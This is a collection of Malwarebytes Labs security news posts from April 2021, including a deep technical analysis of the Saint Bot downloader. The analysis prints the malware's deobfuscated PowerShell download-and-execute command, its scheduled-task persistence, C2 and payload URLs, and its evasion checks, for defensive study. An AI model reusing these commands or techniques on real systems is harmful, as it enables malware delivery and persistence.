Julia Angwin, editor-in-chief of the investigative news outlet The Markup, said that her organization chose to opt out of FLoC.

We @themarkup opted out of Google’s newfangled cookie-less tracking system (FLoC) so our readers will not be targeted with ads based on visiting our site.

Others who care about reader privacy might want to do the same. @varlogsimon shares how: https://t.co/EVAOo5dJN5 https://t.co/n5UE5Vi9LU

— Julia Angwin (@JuliaAngwin) April 7, 2021

“We @themarkup opted out of Google’s newfangled cookie-less tracking system (FLoC) so our readers will not be targeted with ads based on visiting our site,” Angwin wrote on Twitter. “Others who care about reader privacy might want to do the same.”

Angwin is just one of many journalists who have reported on FLoC technology, most of whom have authored FAQs, explainers, and detailed guides on just what it is Google is trying to do with its recent experiment.

All of those explainers, in fact, point to the biggest problem here: Users are being included in something that they did not know about that will affect how they are treated on the Internet, and they had no say in the matter beforehand.

A private web can incorporate many things. At the very least, it should include user respect.

The post Millions of Chrome users quietly added to Google’s FLoC pilot appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Cryptomining containers caught coining cryptocurrency covertly

Malware Bytes Security - Fri, 04/09/2021 - 8:09am

In traditional software development, programmers code an application in one computing environment before deploying it to a similar, but often slightly different environment. This leads to bugs or errors that only show up when the software is deployed—exactly when you need them least. To solve for this, modern developers often bundle their applications together with all of the configuration files, libraries, and other pieces of software required to run in it in “containers” hosted in the cloud. This method, called containerization, allows them to create and deploy the entire computing environment, so there are no unexpected surprises.

Because a lot of projects rely on many of the same dependencies, developers can get their projects off to a flying start by building on top of pre-configured container images, which can be downloaded from online image repositories like Docker Hub. Those images may in turn be built on top of other images, and so on. So, for example, developer building a plugin for the WordPress content management system might base their project on a container image containing WordPress, and that container might be built on top of another image that includes a web server and database, which may be built on a container image for a popular operating system, like Ubuntu.

Container images provide a simple way to distribute software at the expense of transparency.

Now imagine if a malicious actor could hide a crypto-jackerd in a popular source image, one that might get used and reused thousands of times. They could end up with a huge number of systems mining cryptocurrency for them for free.

Docker images

Docker Hub is the world’s largest library and community for container images and therefore a very attractive target for attackers. Luckily, tampering with containers is not easy and Docker has a strong focus on “Trusted Delivery” which is supposed to guarantee an untampered app. But there is a lot more to be found in container images than just the app.

Uncovered by researchers

In the last several years, Unit 42 researchers have uncovered cloud-based crypto-jacking attacks in which miners are deployed using an image in Docker Hub. Containerization is almost always conducted in a cloud environment, because that contributes to its scalability—behind the scenes popular web applications or services often rely on huge numbers of identical containers. This has some advantages for the crypto-jackers:

  • There are many instances for each target.
  • It is hard to monitor, so miners can run undetected for a long time.

The researchers uncovered 30 images from 10 different Docker Hub accounts that accounted for over 20 million “pulls” (downloads).

The favorite cryptocurrency

The most popular cryptocurrency for attackers to mine is Monero. Monero is a cryptocurrency designed for privacy, promising:

“all the benefits of a decentralized cryptocurrency, without any of the typical privacy concessions”.

No cryptocurrency is anonymous, as many people think, but there are other reasons why the crypto-jackers favor Monero:

  • Many crypto-mining algorithms run significantly better on ASICs or GPUs, but Monero mining algorithms run better on CPUs, which matches what the crypto-jacker can expect to find in a containerized environment.
  • Besides Bitcoin, Monero is one of the better known cryptocurrencies and therefore is expected to hold its value.

Cryptocurrencies are pseudonymous at best, which means that users hide behind a pseudonym, like one or more wallet IDs. Their activities can be tracked—forever—so keeping their identity secret depends on how well they can separate their real identity from their wallet IDs.

XMRig

In most of the recorded attacks that mined Monero, the attackers used XMRig. XMRig is a popular Monero miner and is preferred by attackers because it is easy to use, efficient, and, most importantly, open source, which allows attackers to modify its code. In some images, the researchers found different types of cryptominers. Possibly to enable the attacker to choose the best crypto-miner for the victim’s hardware.

The consequences

Not only will having a crypto-miner in your container lead to either a higher bill or lower performance, there could be other consequences too, because many cloud service providers explicitly forbid mining for cryptocurrencies.

OVH terms for customers Mitigation

Stopping crypto-jackers from taking advantage of popular images can be done at a few levels:

Image providers needs to perform regular checks against tampering, container repositories should monitor for irregularities, and cloud service providers can check outgoing connections for mining-related activity

Container users should avoid downloading containers from untrusted sources, scan images for malware at the build stage, check the integrity of images before and after copying them, and monitor runtime activity and network communication.

Since containers are just another way of arrange software stacks—including operating systems, applications and libraries—all the usual precautions apply too, such as patching vulnerabilities promptly.

Stay safe, everyone!

The post Cryptomining containers caught coining cryptocurrency covertly appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Zoom zero-day discovery makes calls safer, hackers $200,000 richer

Malware Bytes Security - Thu, 04/08/2021 - 8:57am

Two Dutch white-hat security specialists entered the annual computer hacking contest Pwn2Own, managed to find a Remote Code Execution (RCE) flaw in Zoom and are $200,000 USD better off than they were before.

Pwn2Own

Pwn2Own is a high profile event organized by the Zero Day Initiative that challenges hackers to find serious new vulnerabilities in commonly used software and mobile devices. The event is held to demonstrate that popular software and devices come with flaws and vulnerabilities, and offers a counterweight to the underground trade in vulnerabilities.

The “targets” volunteer their software and devices and offer a reward for successful attacks. Fans are treated to a hacking spectacle, successful hackers get kudos and no small amount of cash (in this case the reward was a whopping $200,000 USD), and vendors find nasty bugs that might otherwise be sold to criminals.

Pwn2Own 2021 runs from 6 April to 8 April. The full schedule for this year can be found on their site. This year the event has focused on software and devices used when working from home (WFH), including Microsoft Teams and Zoom, for obvious reasons.

The white hats

Keuper and Alkemade, who are employed by cybersecurity company Computest, combined three vulnerabilities to take over a remote system on the second day of the Pwn2wn event. The vulnerabilities require no interaction of the victim. They just need to be on a Zoom call.

The vulnerability

In the light of responsible disclosure, the full details of the method have been kept under wraps. What we do know is that it was Remote Code Execution (RCE) flaw: As a class of software security flaws that allow a malicious actor to execute code of their choosing on a remote machine over a LAN, WAN, or the Internet.

We also know that the method works on the Windows and Mac version of the Zoom software, but does not affect the browser version. It is unclear whether the iOS- and Android-apps are vulnerable since Keuper and Alkemade did not look into those.

The Pwn2Own organization have tweeted a gif demonstrating the vulnerability in action. You can see the attacker open the calculator on the system running Zoom. Calc.exe is often used as the program that hackers open on a remote system to show that they can run code on the affected machine.

We're still confirming the details of the #Zoom exploit with Daan and Thijs, but here's a better gif of the bug in action. #Pwn2Own #PopCalc pic.twitter.com/nIdTwik9aW

— Zero Day Initiative (@thezdi) April 7, 2021 A Zoom RCE being used to open the Windows calculator Not patched yet

Understandably, Zoom has not yet had the time to issue a patch for the vulnerability. They have 90 days to do so before details of the flaw are released, but they are expected to do it way before that period is over. The fact that the researchers came out on the second day of the Pwn2Own event with this vulnerability does not mean they figured it out in those two days. They will have put in months of research to find the different flaws and combine them into an RCE attack.

Security done right

This event, and the procedures and protocols that surround it, demonstrate very nicely how white-hat hackers work, and what responsible disclosure means. Keep the details to yourself until protection in the form of a patch is readily available for everyone involved (with the understanding that vendors will do their part and produce a patch quickly).

Mitigation

For now, the two hackers and Zoom are the only ones that know how the vulnerability works. As long as it stays that way there is not much that Zoom users have to worry about. For those that worry anyway, the browser version is said to be safe from this vulnerability. For anyone else, keep your eyses peeled for the patch and update at earliest convenience after it comes out.

Stay safe, everyone!

The post Zoom zero-day discovery makes calls safer, hackers $200,000 richer appeared first on Malwarebytes Labs.

Categories: Malware Bytes

SAP warns of malicious activity targeting unpatched systems

Malware Bytes Security - Wed, 04/07/2021 - 10:44am

A timely warning to keep systems patched has appeared, via a jointly-released report from Onapsis and SAP. The report details how threat actors are “targeting and potentially exploiting unprotected mission-critical SAP applications”. Some of the vulnerabilities used were weaponised fewer than 72 hours after patches are released. In some cases, a newly deployed SAP instance could be compromised in just under a week if people aren’t patching.

Old threats cause new problems

The vulnerabilities being exploited were patched months or even years ago. Sadly, when organisations don’t patch and update, compromise is only a step away. This isn’t a new phenomenon, by any means. It doesn’t matter if we’re talking software or hardware fixes, or replacing an insecure Windows XP box on the network, or running updates you’ve been putting off for that old mobile phone in your drawer. Erratic update routines, or worse still, abandoning them altogether can lead to serious consequences.

In its own press release on the subject, SAP warns that a failure to patch could give cybercriminals “full control of the unsecured SAP applications”, while pointing out that its cloud-based solutions are not at risk:

The scope of impact from these specific vulnerabilities is localized to customer deployments of SAP products within their own data centers, managed colocation environments or customer-maintained cloud infrastructures. None of the vulnerabilities are present in cloud solutions maintained by SAP.

The US Department of Homeland Security’s CISA lists some of the serious end-results of failing to make use of the available SAP patches, in an announcement that followed the release of the report:

  • Financial fraud
  • Disruption to business
  • Sensitive data theft
  • Ransomware
  • Halt of operations
Patch early, patch often

From the above list, ransomware alone could lead to any of those security issues. The data in the threat intelligence report is incredibly useful for anybody who thinks they could be affected. Thanks to SAP and Onapsis, we know how brief the window can be for those tasked with defending systems to do something about it. It also highlights how both security and compliance are at risk, along with some of the techniques attackers will try to use out in the wild.

Regular readers will know we’re big on patching and updating. Some of the most undesirable threats around thrive on a lack of regular updates. Manual, as opposed automatic updates, can also bring headaches for organisations struggling to get up to speed with best practices. It’s certainly not easy, with some organisations simply choosing to never patch at all.

A lack of patching may lead to disaster

That risky strategy of little-to-no-patching stands a good chance of going horribly wrong. A study of 340 security professionals in 2019 found 27% of organisations worldwide, and 34% in Europe, said they’d experienced breaches due to unpatched vulnerabilities. If an inability to patch promptly is compounded by delays in detecting new systems added to networks and a lack of regular vulnerability scanning, attackers are left with a lot of room to work with.

If your organisation is a touch lax on patching, or making it up as you go along – fear not! There’s still time to get a grip on this difficult subject. Whether you use any of the systems mentioned in the threat report up above or not, timely patching is the way to go. The threats to your business may not come knocking at the door today, or even tomorrow, but that won’t be the case forever.

The post SAP warns of malicious activity targeting unpatched systems appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Fake Trezor app steals more that $1 million worth of crypto coins

Malware Bytes Security - Wed, 04/07/2021 - 6:08am

Several users of Trezor, a small hardware device that acts as a cryptocurrency wallet, have been duped by a fake app with the same name. The app was available on Google Play and Apple’s App Store and also claimed to be from SatoshiLabs, the creators of Trezor.

According to the Washington Post, the fake Trezor app, which was on the App Store for at least two weeks (from 22 January to 3 February), was downloaded 1,000 times before it was taken down. A fake Trezor app on the Play Store was downloaded by a similar number of users, but it’s not clear how long it was available on the platform.

Those victimized by the fake app couldn’t tell that they were downloading a dodgy app. Apart from the mimicked name and visual style of the Trezor brand, victims have also reported seeing high rating reviews—155 reviews giving it close to a 5 star rating—a common tactic of criminal app developers looking to gain the trust of users.

Phillipe Christodoulou, owner of a dry-cleaning service was one of the many Trezor users who downloaded the fake Trezor app from the App Store. He wanted to check his cryptocurrency balance on his phone and decided to search for and download an app instead of plugging the device into his computer via a USB connection. He lost 17.1 Bitcoins, which was worth $600,000 USD at that time. At the time of writing it is worth more than $1 million USD.

A similar incident happened with James Fajcz, a reliability engineer, in December 2020. He bought both Ethereum and Bitcoin worth $14,000 USD with his savings after seeing the price of digital tokens rising that same month. To ensure his investment was secure, be bought a Trezor, and then downloaded its purported app on his iPhone. When the app didn’t connect to his hardware wallet, he assumed that the app didn’t work. After buying a second round of cryptocurrencies weeks later, he checked the balance on his Trezor device using his computer, but it was empty. He realized he had been conned out of his digital currencies when he reached out to the Trezor community on Reddit.

Both men didn’t know that an official Trezor app doesn’t exist, and both also blamed Apple for letting a fake app into the App Store, a space touted by Apple as “the most trusted marketplace for apps.”

Warning to all Trezor owners using Android devices!

This app is malicious and has no relation to Trezor or SatoshiLabs. Please, don't install it.

Remember that you should never share your seed with anyone until your Trezor device asks you to do it! pic.twitter.com/6C3iKfPDnR

— Trezor (@Trezor) January 18, 2021 In January 2021, the official Trezor account on Twitter warned Android users of a malicious app posing as that belonging to Trezor and SatoshiLabs. This isn’t the first time that criminals have posed as a Trezor app.

Both Google and Apple provide screening of apps before they’re added to their app stores, but these incidents remind us that no form of screening is perfect. Successful criminals are good at finding and exploiting loopholes, or using malicious techniques that are hard to screen for. We don’t know how this malicious app worked, but we can guess that it might simply transfer victims’ cryptocurrency to a wallet (that happens to be owned by the app’s creator), which is very similar to what a legitimate app would be doing.

With cryptocurrencies continuing to gain popularity, expect more scammers to bank on this wave. In May last year, Harry Denley, a cybersecurity researcher specializing in cryptocurrencies, revealed that he discovered almost 75 malicious Google Chrome extensions designed to steal money from cryptocurrency wallets.

Last month, CoinDesk went on a crypto scam hunt and found that both popular app stores have found fake crypto wallet apps.

Cryptocurrency owners are advised to be more vigilant than ever about phishing campaigns in the form of apps and extensions. Trezor users, in particular, should be aware that while there is no app for their hardware wallet now, there will be an official one in the future. Watch the company’s official website and Twitter account for news on that and, until then, avoid downloading Trezor apps and heed the company’s advice: never share your seed until your device asks you to do so.

The post Fake Trezor app steals more that $1 million worth of crypto coins appeared first on Malwarebytes Labs.

Categories: Malware Bytes

A deep dive into Saint Bot, a new downloader

Malware Bytes Security - Tue, 04/06/2021 - 5:37pm

This post was authored by Hasherezade with contributions from Hossein Jazi and Erika Noerenberg

In late March 2021, Malwarebytes analysts discovered a phishing email with an attached zip file containing unfamiliar malware. Contained within the zip file was a PowerShell script masquerading as a link to a Bitcoin wallet. Upon analysis, the obfuscated PowerShell downloader initiated a chain of infection leading to a lesser-known malware called Saint Bot. It turned out that the same malware was also distributed in targeted campaigns against government institutions. For example, we found a COVID19-themed campaign targeting Georgia, where the malicious LNK file was accompanied with a malicious document, and a decoy PDF. Both droppers leaded to Saint Bot instances [1] [2].

Saint Bot is a downloader that appeared quite recently, and slowly is getting momentum. It was seen dropping stealers (i.e. Taurus Stealer, or a simple AutoIt-based stealer) as well as further loaders (example). Yet its design allows to utilize it for distributing any kind of malware. Although currently it does not appear to be widespread, there is indication that it is being actively developed. Furthermore, Saint Bot employs a wide variety of techniques which, although not novel, indicate some level of sophistication considering its relatively new appearance.

In this post, we provide a detailed deep-dive of this malware, covering in-depth analysis of the threat from distribution through post-exploitation. In addition to behavioral analysis, we will explore other techniques employed across the stages of infection including obfuscation and anti-analysis techniques, process injection, and command and control infrastructure and communication.

Distribution

This analysis will be dedicated to a sample that we found distributed by a phishing e-mail. It comes with a ZIP attachment: bitcoin.zip, luring the victim with a chance of getting access to a Bitcoin wallet.

The Saint Bot delivery roadmap

Once we unzip the content, we are provided with a pair of files: one of them is a .lnk file that seemingly leads to a Bitcoin Wallet. It is accompanied with a .txt file, that claims to be a password to this wallet.

The .txt file says:

wallet in folder. Use Electrum to download & save it on your side https://download.electrum.org/4.0.9/electrum-4.0.9-setup.exe Password is: privatemoney9999999usd Thank you

If we try to preview the .lnk via various tools available on Windows, it seems to lead to “C:\Windows\System32\cmd.exe”.

But a closer look inside reveals, that in reality what it contains is a malicious PowerShell script, meant to download the next stage of the malware from the embedded link:

http://68468438438[.]xyz/soft/win230321[.]exe

Deobfuscated script:

&& C:\Windows\System32\cmd.exe /c poweRshELL.eXE -w 1 $env:SEE_MASK_NOZONECHECKS = 1; ImPoRT-modULe bItsTRAnsFer; STArt-bITsTRANSFER -Source "('http://68468438438[.]xyz/soft/win230321.exe')" -Destination $ENV:TEMP\WindowsUpdate.exe ; .('cd') ${eNv:TEMP}; ./WindowsUpdate.exe!%SystemRoot%\System32\SHELL32.dll

The next stage binary is downloaded into the %TEMP% folder, under the name WindowsUpdate.exe, and run from there.

Behavioral analysis

Once run, the main sample drops another executable in the %TEMP% directory:

“C:\Users\admin\AppData\Local\Temp\InstallUtil.exe”

which then downloads two executables named: def.exe, and putty.exe. It saves them in %TEMP% , and tries to execute them with elevated privileges.

If run, the first sample (def.exe) deploys a batch script disabling Windows Defender. The second sample (named putty.exe) is the main malicious component.

Persistence

The sample named putty.exe installs itself and creates a new directory in “AppData/Local” named “z_%USERNAME%”. It drops scripts meant to deploy its other components. The same directory also contains a copy of NTDLL, saved under the name “wallpaper.mp4”. This copy will be used by the malicious binary instead of the legitimate one.

The main sample is copied into the Startup directory under a name impersonating one of the legitimate executables found in the infected system:

The scripts from the “AppData/Local/z_[user]” are used to deploy the main sample. During the first run, the executable injects itself into “EhStorAurhn.exe“. Below we can see the injected implant detected and dropped by HollowsHunter.

Once the implant was injected, it connects to its Command-and-Control server (C2) and proceeds with its main actions. Observing the network traffic we will find the URL of the malware’s C2 queried repeatedly:

http[:]//update-0019992[.]ru/testcp1/gate.php

Following this URL we can see the related C2 panel, which looks typical for the Saint Bot:

Internals The .NET downloader

The sample downloaded from the initial .lnk is a next stage downloader, written in .NET and obfuscated. It carries another .NET binary in its resources, stored as a bitmap.

The bitmap carries encrypted content

During the run, it decodes the next stage, which turns out to be a .NET DLL (a98e108588e31f40cdaeab1c04d0a394eb35a2e151f95fbf8a913cba6a7faa63)

Decoded array reveals the PE file

The DLL has an internal name zOAI.dll:

The loader invokes a method from the DLL:

Invoking the method inside the DLL: zOAI.CaCl.aXt()

The referenced method inside the DLL:

The content of the DLL is heavily obfuscated at bytecode level, and unreadable for typical tools such as dnSpy.

The DLL is run with the help of InstallUtil.exe (e56a7e5d3ab9675555e2897fc3faa2dd9265008a4967a7d54030ab8184d2d38f) – which is a standard .NET Framework Installation utility – dropped into %TEMP% folder.

The deployed .NET binary is responsible for downloading and deploying two executables: the one disabling Windows Defender, and another, which is the main payload (in a packed form).

The dropped elements

Two executables are dropped in the %TEMP% directory:

The first one (def.exe) is just a batch script wrapped by the BatToExe tool. The script: Disable Window Defender.bat is meant to prepare the ground for the deployment of the main bot.

The other one (putty.exe) is the actual payload, packed by an underground crypter.

The unpacked payload

The final payload that is carried inside putty.exe can be dumped from the memory with the help of PE-sieve/HollowsHunter. As a result, we get the following unpacked sample: a4b705baac8bb2c0d2bc111eae9735fb8586d6d1dab050f3c89fb12589470969

The compilation timestamp indicates that the payload is pretty fresh – from March of this year.

Obfuscation Strings

Looking inside we can see that the sample is mildly obfuscated. Majority of the strings are encoded in a way reminding of a simple substitution cipher.

Only few strings are left in plaintext – including URLs to connect, but also some commands prefixed with “de”, i.e. “de:LoadMemory”, “de:regsvr32”, “de:LL”. We can also see the hardcoded panel URL: “/testcp1/gate.php”.

Some (but not all) of the strings can be deobfuscated with the help of the FLOSS tool. We can find out there the name and the version of this malware: “saint_v3” – which indicates the “Saint Bot version 3”.

The rest of the strings has been deobfuscated with the help of libPeConv (decoder’s source here). Full list (along with their offsets) is available here.

API calls

API functions are loaded dynamically, using the names that are decoded just before use:

They can be deobfuscated with the help of various approaches, i.e. by filling their names basing on the deobfuscated strings. They can be also traced automatically at the execution time, i.e. with the help of TinyTracer. Sample result:

API calls tagged with TinyTracer

Another, simpler (yet more invasive) way of deobfuscation is by rebuilding the Import Table within the PE to include the dynamically added functions. We can do it by dumping the same binary i.e. with PE-sieve, with the option of full Import Table reconstruction ( /imp 3). Yet we have to remember that this method may be less accurate in some cases: in contrast to tracing, it won’t help to deobfuscate calls that are made i.e. via registers.

Imports reconstructed with PE-sieve Execution flow

The sample has 3 alternative execution paths:

  1. Install itself
  2. Inject itself into EhStorAurhn.exe
  3. Communicate with the C2 and proceed with the main operations

Before it proceeds with any action, a set of environment checks is performed.

Defensive checks

The sample defends itself against being executed in a controlled (or otherwise forbidden) environment by performing a number of checks. In case any forbidden condition is detected, the sample drops and deploys del.bat script that is supposed to delete it after the execution finish. After that the sample terminates.

Among the environment checks we can find a locale check. This is very common in case the sample is intended to avoid attacking certain countries.

In current case 7 locales are blacklisted:

  • 1049 – Russian
  • 1058 – Ukrainian
  • 1059 – Belarusian
  • 1067 – Armenian – Armenia
  • 1087 – Kazakh
  • 2072 – Romanian
  • 2073 – Russian – Moldova

It also queries the registry searching for keys typical for virtual environments. Queried registry key: “SYSTEM\CurrentControlSet\Services\disk\Enum” has its values checked against the list: QEMU, VIRTIO, VMWARE, VBOX, XEN.

Note that the checks are gathered all in one function, and thanks to this fact they can be easily patched out of the sample to make the analysis easier.

Mutex and persistence

The malware prevents itself from being deployed more than once by creating the mutex “saint_v3”.

If the mutex already exists, the program exits with an error. Otherwise it proceeds with installing its persistence. It sets a run key in “\Software\Microsoft\Windows\CurrentVersion\Run” as well as a scheduled task named “Maintenance”.

‘/create /sc minute /mo 5 /tn “Maintenance” /tr “C:\Users\%USERNAME%\AppData\Local\z_%USERNAME%\%USERNAME%.vbs” /F’ Process injection

The malware injects itself into a newly created process “C:\Windows\System32\EhStorAuthn.exe”.

It writes its payload into the process using ZwWriteVirtualMemory and then executes it with the help of NtQueueApcThread and ZwAlertResumeThread. This is a variant of a well known injection involving adding a start routine into APC Queue of the main thread. It uses low-level versions of the dedicated APIs, exported by NTDLL.

The less typical twist in this technique lies in the fact that it does not use the original NTDLL, but its renamed copy – the one that it previously dropped as wallpaper.mp4. This is one of a simple (and pretty naive) tricks that aim to make detection more difficult. It bases on the assumption that monitoring tools may have installed hooks inside the original NTDLL . By using a renamed copy of this DLL, the authors tried to prevent the called APIs from being watched by those hooks. In this case the APIs that they tried to hide are the ones related to code injection.

Communication with the C2

The malware comes with addresses of C2 servers hardcoded, as well as the address of the gate. The name of the browser agent is also hardcoded, in obfuscated form: “Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 YaBrowser/15.10.2454.3865 Safari/537.36

The bot keeps querying the C2 and waiting for the commands. Sample beacon:

transfer=ZG5ufX1ibnhnblRUVDVNcFFDVFRUdVFDTXk+SSBbIFVGeVpmSUlReUM1RFRUVDJQVFRUT3hiVFRUS1RUVDJDY2ZEKHopIGF5RmYoPDApIFFWZGd9NzcgYVVvIEAgYm1bN11BU1RUVHhUVFRMYzVDTTVGTSBHXXwgXUY1c1lRSEkgfE01c2NmRlRUVEFRRVlUVFRifQ==

Which decodes to a list of parameters collected from the infected machine, for example:

transfer=-994429369___admin___Windows 7 Professional___IE___x32___1___Intel(R) Core(TM) i5-6400 CPU @ 2.70GHz___3___Standard VGA Graphics Adapter___High___24'

The content sent to/from the C2 is obfuscated by the same algorithm as the internal strings – referenced as decode_wstring – but with a different parameter: -7 (7 for encode, -7 to decode) instead of -6. The received data is first being decoded, and then split by a delimiter “\” into a list of commands.

The list of commands processed is very small. Some of them come with a distinctive prefix “de:“.

Sample response:

XE1mInNGeUVGNXBNNWM1IlljY3M6cXFDNXBmS01tSVFjZnFaUURmbWZPZlw=

And the same response decoded:

\de"programdata"http://name1d.site/file.exe\'

Which means: download the executable from the given link, drop it in “ProgramData” directory, and execute.

As the choice of commands shows, the role of this bot is to deliver further payloads to the infected machine.

The Panel

It is always beneficial to compare what we observed by the analysis of the bot, with the server-side implementation of the same actions. In this case it happens to be possible as we gained access to the leaked source of the panel.

Overview

The panel of this bot is very small.

The main view:

The list of available bots comes with minimalist details about every victim machine, such as Username, IP, OS, Architecture, Privileges with which the bot was deployed, Country, First and last timestamp of the communication with the C2, and deployed Actions.

Task panel allows to send commands to the bots:

In this case, the list of commands is very small, as the Saint Bot serves as a downloader for other malware. The available tasks are:

  • Download&Execute (other payloads)
  • Update (the Saint Bot)
  • Uninstall

In addition we can set several additional options to where the downloaded payload should be dropped. Three drop directories are supported: ProgramData, AppData, Temp:

The operator can also set various filters, defining on which of the infected machines the payloads will be dropped:

The list of payloads served by the examined instance point to files uploaded at Discord:

https[:]//cdn.discordapp[.]com/attachments/821809080812437507/822009014418276353/mixinte.exe https[:]//cdn.discordapp[.]com/attachments/822140450072821791/822146649219661844/z.exe The code

Like most malware panels, this one is written in PHP, with an SQL database under the hood. The module responsible for sending the tasks to the bot is named: tasks.php. We can find the same commands we observed by analyzing the executable’s code. Three types of tasks:

  • de – which stands for: Download&Execute
  • update
  • uninstall

We can also find the available parameters, also correlating with the parameters hardcoded in the previously analyzed executable.

  • regsvr32 – stands for: download a DLL and run it via regsvr32
  • ll – stands for: download a DLL and run it via LoadLibrary
  • file – run from a dropped file
  • mem – stands for manually load and inject into a process

Some parameters are further translated, which make them a matching set with the commands that were visible in the bot’s code:

So, for the “de” option we get:

  • de:LL
  • de:LoadMemory
  • de:regsvr32

Compared with the commands from the previous analysis part:

Once the task is created, it is added to the database, to be polled and executed further:

Evolution

This bot is fairly new and is evolving slowly and steadily. The earliest version found by the similar artifacts was compiled in January (0481edd888e70087115d603ac5c18fe3e15420a28a71bc1ef753d74c27474e9a ). It came with the same set of commands, yet slightly rewritten code.

Command processing function from the February edition

It used a mutex “saint2021_NewGeneration” suggesting that this bot went through some major changes since the beginning of this year.

The associated panel suggested that the version using this mutex was numbered as 2.0 (credits: @siri_urz)

Yet another downloader

Saint Bot is yet another tiny downloader. We suspect it is being sold as a commodity on one of the darknet forums, and not linked with a one specific actor. It is not as mature as SmokeLoader, but quite new, and currently actively developed. The author seems to have some knowledge of malware design, which is visible by the wide range of techniques used. Yet, all the deployed techniques are well-known and pretty standard, not showing much creativity so far. Will it become the next wide-spread downloader or disappear from the landscape, pushed away by some other, similar products? We have yet to see.

Indicators of Compromise

Initial dropper (.lnk)

63d7b35ca907673634ea66e73d6a38486b0b043f3d511ec2d2209597c7898ae8

Next stage .NET dropper

b0b0cb50456a989114468733428ca9ef8096b18bce256634811ddf81f2119274

.NET downloader

a98e108588e31f40cdaeab1c04d0a394eb35a2e151f95fbf8a913cba6a7faa63

Saint Bot (packed)

2d88db4098a72cd9cb58a760e6a019f6e1587b7b03d4f074c979e776ce110403

Saint Bot core

a4b705baac8bb2c0d2bc111eae9735fb8586d6d1dab050f3c89fb12589470969

Downloader domain

68468438438[.]xyz

C2 servers

update-0019992[.]ru

380222001[.]xyz

The post A deep dive into Saint Bot, a new downloader appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Pre-installed auto installer threat found on Android mobile devices in Germany

Malware Bytes Security - Tue, 04/06/2021 - 4:32pm

Users primarily located in Germany are experiencing malware that downloads and installs on their Gigaset mobile devices—right out of the box! The culprit installing these malware apps is the Update app, package name com.redstone.ota.ui, which is a pre-installed system app. This app is not only the mobile device’s system updater, but also an Auto Installer known as Android/PUP.Riskware.Autoins.Redstone.

  • Photo by Malwarebytes Forum user Mark-Herzog
  • Photo by Malwarebytes Forum user Mark-Herzog
Infected devices and other important notes

Although this issue seems to be primarily found on Gigaset mobile devices, we have also found other manufacturers involved. Here is a list of make/model/OS version of mobile devices found with Android/PUP.Riskware.Autoins.Redstone:

  • Gigaset GS270; Android OS 8.1.0
  • Gigaset GS160; Android OS 8.1.0
  • Siemens GS270; Android OS 8.1.0
  • Siemens GS160; Android OS 8.1.0
  • Alps P40pro; Android OS 9.0
  • Alps S20pro+; Android OS 10.0

We should note that the names Gigaset and Siemens have considerable overlap—Gigaset was formerly known as Siemens Home and Office Communications Devices. We listed both to erase any confusion.

It important to realize that every mobile device has some type of system update app. Unless you are experiencing the exact behaviors in the next section, you are most likely not infected. Another key point is that this pre-installed update app is the not the same as what is described in Android “System Update” malware steals photos, videos, GPS location. In that case, the malware is simply hiding as an update app, but is not a pre-installed system app.

Malware behavior

For most Gigaset users experiencing this infection, com.redstone.ota.ui installs three versions of Android/Trojan.Downloader.Agent.WAGD. The package name of this malware always starts with “com.wagd.” and is followed by the name of the app. Here are some examples:

  • Package name: com.wagd.gem
  • App name: gem
  • Package name: com.wagd.smarter
  • App name: smart
  • Package name: com.wagd.xiaoan
  • App name: xiaoan

According to forum users and analysis, Android/Trojan.Downloader.Agent.WAGD is capable of sending malicious messages via WhatsApp, opening new tabs in the default web browser to game websites, downloading more malicious apps, and possibly other malicious behaviors. The malicious WhatsApp messages are most likely in order to further spread the infection to other mobile devices.

In addition, some users also experience Android/Trojan.SMS.Agent.YHN4 on their mobile devices. The downloading and installation of this SMS Agent is due to Android/Trojan.Downloader.Agent.WAGD visiting gaming websites containing malicious apps. Thereupon, the mobile device contains malware capable of sending malicious SMS messages. Like with the malicious WhatsApp messages, it can in addition send malicious SMS messages to further spread the infection.

  • Photo by Malwarebytes Forum user HendrikusE
Awaiting resolution

Because com.redstone.ota.ui is a system app, you cannot remove it using traditional methods. Further, past evidence from Adups and other variants shows that disabling pre-installed update apps is either impossible or it re-enables shortly after disabling. Therefore, just as the case with UMX back in January 2020, it is up to the device manufacturer to push an update to truly fix this issue. Keep in mind that even after the manufacturer fixes the issue, they can push out yet another update in the future to re-infect. There is some evidence that this has been the case with UMX as of recent, but that is another blog for another day. 

In the case of Gigaset, German blogger Günter Born on his blog Borncity has already gotten the ball rolling by contacting Gigaset to resolve. In the meantime, according to an Attention pinned at the bottom of Mr. Born’s blog he suggests the following (translating from German to English using Google Translator):

Attention: I recommend all Gigaset Android device owners to heed the information in the blog post Malware attack: What Gigaset Android device owners should do now and to lay the device dead. At least until Gigaset has responded and the process has been completely clarified.

A safe workaround

The aforementioned recommendation to quote, lay the device dead, may not be an option for some users if this is their only mobile device. Allow me to suggest another option that still gives users the ability to use their Gigaset mobile device safely.

Yes, it is true you cannot remove it using traditional methods, but we have a workaround!

We can use the method below to uninstall Update (com.redstone.ota.ui) for current users (details in link below):

https://forums.malwarebytes.com/topic/216616-removal-instructions-for-adups/

From the tutorial above, use this command during step 7 under Uninstalling Adups via ADB command line to remove:

adb shell pm uninstall -k –user 0 com.redstone.ota.ui

At this point, run a Malwarebytes for Android scan to remove any remaining malware apps.

Checking for updates

Here is the kicker. Remember that the Update app is also the mobile device’s only way to update the system. Thus, if and when Gigaset comes up with a resolution, you will need to check for system updates by re-installing Update.

You can re-install using this command:

adb shell pm install -r –user 0 <full path of the apk>

The two full path of the apk’s we have seen so far are as follows:

/system/priv-app/ThirdPartyRSOTA/ThirdPartyRSOTA.apk

/system/app/Rsota/Rsota.apk

If neither of these paths work, you can find the correct path, even after uninstalling for current user, by running this command:

adb shell pm list packages -f -u

Copy/paste the output into a text editor (like Notpad) and search for com.redstone.ota.ui to find the correct path.

If there are no updates to install or if the update that does install does not resolve the issue, remember to once again uninstall Update for the current user.

Never ending battle

Assisting customers with resolving pre-installed malware is a reoccurring action by me and our mobile support staff. Fortunately, in the case of Gigaset users, there is a workable resolution. If you are experiencing similar or other mobile malware issues you can reach us on our Malwarebytes Forum or for more thorough support submit a support ticket. As always, stay safe out there!

The post Pre-installed auto installer threat found on Android mobile devices in Germany appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Aurora campaign: Attacking Azerbaijan using multiple RATs

